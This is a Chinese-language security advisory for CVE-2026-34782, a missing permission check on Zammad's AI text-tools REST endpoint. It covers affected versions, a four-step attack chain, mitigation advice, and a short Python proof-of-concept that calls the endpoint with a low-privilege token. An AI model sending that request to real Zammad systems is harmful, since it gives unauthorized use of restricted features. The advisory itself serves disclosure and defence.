CVE-2026-34782 CVSS 4.3 中危

CVE-2026-34782 Zammad权限绕过漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34782

漏洞类型

权限绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Zammad

漏洞概述

Zammad是一款基于Web的开源帮助台系统。在7.0.1和6.5.4之前的版本中，系统存在访问控制缺陷。REST端点POST /api/v1/ai_assistance/text_tools/:id未验证用户是否有权使用特定的文本工具。这允许低权限用户未经授权访问受限功能，违反了最小权限原则。

技术细节

该漏洞源于Zammad后端在处理AI辅助文本工具API请求时的逻辑缺陷。受影响版本在处理POST /api/v1/ai_assistance/text_tools/:id请求时，仅检查了基本的身份认证（即用户是否登录），但未检查用户是否具备调用该特定工具的权限。攻击者利用此漏洞，只需拥有一个普通用户账号，即可通过构造HTTP请求，指定任意工具ID调用系统内部的文本处理接口。虽然CVSS评分显示机密性影响为无，但这种未授权的API调用可能导致敏感信息被AI工具处理并泄露，或导致系统资源被滥用。修复方案是在该端点增加了严格的权限校验逻辑。

攻击链分析

STEP 1

1. 信息收集与认证

攻击者在Zammad平台上注册一个普通用户账号，或使用已有的低权限账号登录，获取有效的会话Token或API密钥。

STEP 2

2. 分析API端点

攻击者通过抓包或查阅文档，确定存在漏洞的API端点路径为/api/v1/ai_assistance/text_tools/:id，并推测可能的工具ID。

STEP 3

3. 构造恶意请求

攻击者使用低权限Token构造POST请求，向目标端点发送数据，试图调用管理员或特定角色的文本工具功能。

STEP 4

4. 执行未授权操作

服务器因缺失权限校验，成功处理请求并返回结果，攻击者从而在未授权的情况下使用了受限功能。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
target_url = "https://example.com/api/v1/ai_assistance/text_tools/1"

# Low privilege user token (obtained after login)
auth_token = "YOUR_LOW_PRIV_TOKEN"

headers = {
    "Authorization": f"Token token={auth_token}",
    "Content-Type": "application/json"
}

# Payload to use the text tool
payload = {
    "text": "Analyze this text",
    "options": {}
}

try:
    response = requests.post(target_url, json=payload, headers=headers)
    if response.status_code == 200:
        print("[+] Exploit successful! Response:")
        print(response.json())
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
except Exception as e:
    print(f"Error: {e}")

影响范围

Zammad < 7.0.1

Zammad < 6.5.4

防御指南

临时缓解措施

建议管理员立即检查系统版本，若无法立即升级，应在WAF或反向代理层临时阻断对/api/v1/ai_assistance/text_tools/*路径的访问请求，或限制仅能由内网管理IP访问，以降低风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表